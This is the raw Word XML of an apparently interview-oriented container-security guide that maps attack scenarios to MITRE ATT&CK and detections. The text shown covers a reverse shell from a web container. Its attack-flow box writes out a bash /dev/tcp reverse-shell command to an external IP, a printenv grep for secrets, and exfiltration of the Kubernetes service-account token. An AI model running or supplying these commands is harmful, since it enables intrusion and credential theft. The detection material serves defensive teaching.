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B2A4A"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTAINER SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK SCENARIOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Scenarios × 5 Detections | Full Telemetry Mapping | Interview Ready</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F5C9E" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gopikrishna Vallepu — Cloud &amp; Container Security SME Candidate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2760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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30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Primary MITRE Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Key Detection Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Reverse Shell from Web Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Exec → C2 → Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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CWPP + Network Intel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Dirty Pipe Container Escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Privilege Escalation → Escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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CWPP PREVENT + KAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Cryptomining via Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Supply Chain → Resource Hijack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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Image Assessment + CSPM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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kubectl exec Credential Harvest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Valid Accounts → Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="276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K8s Audit + CWPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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ArgoCD DaemonSet Backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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Persistence → Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:left w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:bottom w:val="single" w:color="BBBBBB" w:sz="4"/>
              <w:right w:val="single" w:color="BBBBBB" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">K8s Audit + CloudTrail + CWPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Type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1F5C9E" w:sz="4"/>
              <w:left w:val="single" w:color="1F5C9E" w:sz="4"/>
              <w:bottom w:val="single" w:color="1F5C9E" w:sz="4"/>
              <w:right w:val="single" w:color="1F5C9E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F5C9E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="A0522D" w:sz="4"/>
              <w:left w:val="single" w:color="A0522D" w:sz="4"/>
              <w:bottom w:val="single" w:color="A0522D" w:sz="4"/>
              <w:right w:val="single" w:color="A0522D" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A0522D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CSPM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:left w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF"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K8s Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E6B6B" w:sz="4"/>
              <w:left w:val="single" w:color="0E6B6B" w:sz="4"/>
              <w:bottom w:val="single" w:color="0E6B6B" w:sz="4"/>
              <w:right w:val="single" w:color="0E6B6B" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F8F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E6B6B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="5B2D8E" w:sz="4"/>
              <w:left w:val="single" w:color="5B2D8E" w:sz="4"/>
              <w:bottom w:val="single" w:color="5B2D8E" w:sz="4"/>
              <w:right w:val="single" w:color="5B2D8E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F3ECF9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B2D8E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CloudTrail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D6E4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F5C9E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCENARIO 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse Shell from Compromised Web Container</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="4A4A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application layer RCE → runtime shell → network C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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T1190</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Exploit Public-Facing Application</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Initial Access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RCE via unsanitized input in Node.js API endpoint (Prototype Pollution / Deserialization)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T1059.004</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Unix Shell</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Execution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Attacker spawns /bin/bash via the exploited process, establishing interactive shell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T1071.001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Web Protocols (HTTPS C2)</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Command &amp; Control</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Reverse shell tunneled over HTTPS port 443 to attacker C2, blending with legitimate traffic</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T1041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Exfiltration Over C2 Channel</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Exfiltration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Environment variables, secrets, and service account token exfiltrated through same C2 channel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T1082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System Information Discovery</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Discovery</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Attacker runs uname -a, env, cat /proc/1/cgroup to understand container context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker sends malicious POST body → Node.js deserializes payload →</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">executes: bash -c 'bash -i &gt;&amp; /dev/tcp/185.220.x.x/443 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Interactive shell inside payments-api pod</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ printenv | grep -Ei "secret|key|token|password"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Exfiltrates JWT at /var/run/secrets/kubernetes.io/serviceaccount/token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Uses token from external server for IRSA abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Detections with Full Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse TCP Shell via Process Lineage</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node (PID 1234) spawns bash → bash spawns curl/nc with /dev/tcp redirect. Parent-child chain: entrypoint → node → bash is never legitimate in a web container.</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ReverseTCPShell | SuspiciousChildProcess.WebServer | Severity: Critical</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CloudTrail (in-container). VPC Flow Logs: TCP SYN to 185.220.x.x:443 from pod IP (first-seen destination).</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Trojan:Runtime/ReverseShell — DNS or IP matches known C2 infrastructure in GuardDuty threat intel feed.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K8s audit event for shell itself. Prior kubectl exec events? Check for pre-exec from attacker testing access.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Node apps never spawn interactive bash shells. Zero legitimate cases. If alert fires in a web namespace — treat as confirmed breach. Only suppression: explicitly flagged debug containers with time limit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">First-Seen External Domain from Container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E6B6B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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DNS query from payments-api container to c2.attacker[.]io — domain never seen in 180-day cluster history. eBPF network hook captures the lookup before any connection is established.</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FirstSeenExternalDomain.Container | BeaconLikeTraffic.PeriodicC2 (if periodic interval detected)</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VPC Flow Logs: ALLOW record for pod IP → external IP on port 443. Not blocked by network policy (misconfiguration).</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UnauthorizedAccess:Runtime/TorIPCaller or NetworkCommunication finding if IP in threat intel.</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Indirectly: check if NetworkPolicy was recently modified to allow egress before incident.</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Production pods should have deny-all egress with explicit allow list. Any first-seen domain from a production pod is HIGH signal. Check: is the domain in an approved CDN or API vendor list? C2 domains fail this check.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Variable Credential Scraping</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Process executes env or printenv immediately after interactive shell spawn. Pattern: bash → env → grep (credential keyword). This sequence in a production container is a forensic indicator of credential harvesting.</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SuspiciousEnvironmentEnumeration | InteractiveContainerSession (TTY allocated)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If harvested AWS credentials are used: AssumeRoleWithWebIdentity from external IP (CIEM alert).</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Credential:Runtime/EnvironmentVariableStolen (if GuardDuty Runtime enabled on EKS).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direct event. Correlate with prior exec events. Check if ServiceAccount was recently given broader RBAC.</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Developers debugging may run env inside a container. Key differentiator: (1) Was a TTY shell spawned? (2) Is grep filtering for secret/key/password/token? (3) Is this a production namespace? All three together = confirmed malicious.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
